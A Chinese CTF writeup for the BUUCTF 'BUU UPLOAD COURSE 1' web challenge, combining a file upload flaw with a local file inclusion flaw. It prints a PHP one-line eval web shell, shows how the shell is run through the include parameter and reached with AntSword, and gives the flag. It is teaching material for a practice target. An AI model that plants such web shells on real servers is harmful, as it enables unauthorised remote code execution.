【CTF Web】BUUCTF BUU UPLOAD COURSE 1 Writeup(文件上传+PHP+文件包含漏洞)

BUU UPLOAD COURSE 1

1

上课用~

点击启动靶机。


解法

疑似存在文件包含漏洞。

bash 复制代码
http://15a5666e-1796-4f76-b892-0b69cf97df8e.node5.buuoj.cn:81/index.php?file=upload.php

查看网页源代码。判断是后端检查。

html 复制代码
<!DOCTYPE html>
<html lang="zh-cn">
<head>
    <meta charset="UTF-8">
    <title>上传文件</title>
</head>
<body>
<div style="text-align: center">
    <h>文件会被上传到 ./uploads</h>
    <form action="index.php?file=upload.php" method="post" enctype="multipart/form-data">
        <input type="file" name="upload_file"/>
        <input type="submit" value="上传"/>
    </form>
</div>
</body>
</html>

上传一句话木马。

php 复制代码
<?php @eval($_POST['a']); ?>

文件后缀会被重命名,后缀变为 .jpg。

用蚁剑连接:

bash 复制代码
http://15a5666e-1796-4f76-b892-0b69cf97df8e.node5.buuoj.cn:81/index.php?file=uploads/66374dbc5c2dc.jpg

连接成功。

在根目录找到 flag。

Flag

bash 复制代码
flag{6e79908c-7d5e-4ce4-95ca-4ca1b5602f71}

声明

本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的 。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规

博主坚决反对任何形式的非法黑客行为 ,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规不得用于任何非法目的 。对于因使用这些技术而导致的任何后果,博主不承担任何责任

相关推荐
星竹晨L12 分钟前
【C++】深入理解list底层:list的模拟实现
开发语言·c++
豐儀麟阁贵23 分钟前
Java知识点储备
java·开发语言
豐儀麟阁贵32 分钟前
2.3变量与常量
java·开发语言
什么半岛铁盒2 小时前
C++11 多线程与并发编程
c语言·开发语言·c++
Kiri霧6 小时前
Linux下的Rust 与 C 的互操作性解析
c语言·开发语言·rust
雪芽蓝域zzs6 小时前
uniapp AES 加密解密
开发语言·uni-app·c#
雨夜的星光6 小时前
Python JSON处理:load/loads/dump/dumps全解析
开发语言·python·json
fen_fen7 小时前
Java打包时,不将本地Jar打包到项目的最终 JAR 中
开发语言·python·pycharm
风语者日志9 小时前
CTF攻防世界WEB精选基础入门:command_execution
web安全·网络安全·ctf·小白入门
wjs20249 小时前
SQL AND & OR 操作符详解
开发语言